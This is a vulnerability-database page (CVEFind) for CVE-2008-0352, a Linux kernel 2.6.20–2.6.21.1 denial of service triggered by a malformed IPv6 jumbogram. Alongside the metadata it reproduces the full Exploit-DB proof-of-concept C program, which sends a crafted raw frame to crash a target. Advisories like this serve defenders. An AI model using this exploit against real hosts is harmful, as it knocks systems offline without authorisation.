English
Français
Light
Dark
System

CVEFind - Alertes CVE

Restez informé en continue
Créer un compte Ouvrez un compte Simple et Gratuit Se connecter Gérez vos alertes

CVE-2008-0352 : Détail

CVE-2008-0352

Overflow
1.95%V3
Network
2008-01-17 22:00 +00:00
2017-09-28 10:57 +00:00
CVE.org
NVD

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

The Linux kernel 2.6.20 through 2.6.21.1 allows remote attackers to cause a denial of service (panic) via a certain IPv6 packet, possibly involving the Jumbo Payload hop-by-hop option (jumbogram).

Informations

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 4893

Date de publication : 2008-01-10 23:00 +00:00
Auteur : Clemens Kurtenbach
EDB Vérifié : Yes

/* * Clemens Kurtenbach <ckurtenbach at s21sec . com> * PoC code for exploiting the jumbo bug found in * linux kernels >=2.6.20 and <=2.6.21.1 * gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash * */ /* io */ #include <stdio.h> #include <string.h> #include <stdlib.h> /* network */ #include <sys/socket.h> #include <linux/if_packet.h> #include <linux/if_ether.h> #include <linux/if_arp.h> #include <netdb.h> #include <linux/if.h> #define MY_FRAME_LEN 1145 char *resolve6(unsigned char *target) { char *ret_addr; struct in6_addr my_in6; char *glob_addr = (char *) &my_in6; struct addrinfo addr_hints, *addr_result; unsigned char out[64]; memset(&addr_hints, 0, sizeof(addr_hints)); addr_hints.ai_family = AF_INET6; if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) { printf("getaddrinfo() error\n"); exit(1); } if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){ printf("getnameinfo() error\n"); exit(1); } if(inet_pton(AF_INET6, out, glob_addr) < 0) { printf("inet_pton() error\n"); exit(1); } if((ret_addr = malloc(16)) == NULL) { printf("malloc() error\n"); exit(1); } memcpy(ret_addr, my_in6.s6_addr, 16); return ret_addr; } int main(int argc, char *argv[]) { if (argc < 4) { printf("usage: ./ipv6_jumbo_crash <fe80::1:2:3> <00:11:22:33:44:55> <eth0>\n"); exit(1); } /* handle IPv6 destination */ unsigned char *dest_ip = resolve6(argv[1]); /* handle MAC */ unsigned char dest_mac[7]; sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1], (unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3], (unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]); /* handle interface */ unsigned char *iface; iface = argv[3]; /* buffer for ethernet frame */ void *buffer = (void*)malloc(MY_FRAME_LEN); /* pointer to ethenet header */ unsigned char *etherhead = buffer; struct ethhdr *eh = (struct ethhdr *)etherhead; /* our MAC address */ unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 }; unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02}; /* prepare socket */ int s; s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (s < 0) { printf("cannot create socket: [%d]\n",s); exit(1); } /* RAW communication */ struct sockaddr_ll socket_address; socket_address.sll_family = PF_PACKET; socket_address.sll_protocol = htons(ETH_P_IP); socket_address.sll_ifindex = if_nametoindex(iface); socket_address.sll_hatype = ARPHRD_ETHER; socket_address.sll_pkttype = PACKET_OTHERHOST; socket_address.sll_halen = ETH_ALEN; /* set the frame header */ memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN); memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN); eh->h_proto = 0xdd86; // IPv6 /* the buffer we want to send */ unsigned char bad_buffer[] = { 0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 }; memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN); /* overwrite our src and dst ip */ memcpy((void*)(buffer+22), (void*)src_ip, 16); memcpy((void*)(buffer+38), dest_ip, 16); /* send the buffer */ int send_result = 0; send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address)); if (send_result == -1) { printf("could not send frame: [%d]\n", send_result); exit(1); } else printf("frame send to ip [%s] with mac [%s] on iface [%s]\n",argv[1],argv[2],argv[3]); return 0; } // milw0rm.com [2008-01-11]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.2

Linux>>Linux_kernel >> Version 2.6.2

Linux>>Linux_kernel >> Version 2.6.2

Linux>>Linux_kernel >> Version 2.6.2

Linux>>Linux_kernel >> Version 2.6.20

Linux>>Linux_kernel >> Version 2.6.20

Linux>>Linux_kernel >> Version 2.6.20.1

Linux>>Linux_kernel >> Version 2.6.20.2

Linux>>Linux_kernel >> Version 2.6.20.3

Linux>>Linux_kernel >> Version 2.6.20.4

Linux>>Linux_kernel >> Version 2.6.20.5

Linux>>Linux_kernel >> Version 2.6.20.6

Linux>>Linux_kernel >> Version 2.6.20.7

Linux>>Linux_kernel >> Version 2.6.20.8

Linux>>Linux_kernel >> Version 2.6.20.9

Linux>>Linux_kernel >> Version 2.6.20.10

Linux>>Linux_kernel >> Version 2.6.20.11

Linux>>Linux_kernel >> Version 2.6.20.12

Linux>>Linux_kernel >> Version 2.6.20.13

Linux>>Linux_kernel >> Version 2.6.20.14

Linux>>Linux_kernel >> Version 2.6.20.15

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21

Linux>>Linux_kernel >> Version 2.6.21.1

References

https://www.exploit-db.com/exploits/4893
Tags : exploit, x_refsource_EXPLOIT-DB

Plus d'informations
Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.